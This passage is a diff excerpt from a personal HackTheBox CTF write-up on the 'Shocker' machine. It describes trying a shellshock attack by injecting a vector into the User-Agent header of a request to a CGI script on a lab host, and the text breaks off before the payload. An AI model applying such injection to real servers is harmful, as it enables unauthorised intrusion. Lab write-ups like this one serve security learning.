MartinoTommasini/MyDiary/ctf/HackTheBox/Shocker/README.md

  06:58:54 up 8 min,  0 users,  load average: 0.06, 0.08, 0.07
 ```

-Always keeping in mind the title of the machine, we try a shellshock attack on this.
+We try a shellshock attack on this script.
 We inject our vector in the User Agent field:
 ```
 GET /cgi-bin/user.sh HTTP/1.1
 Host: 10.10.10.56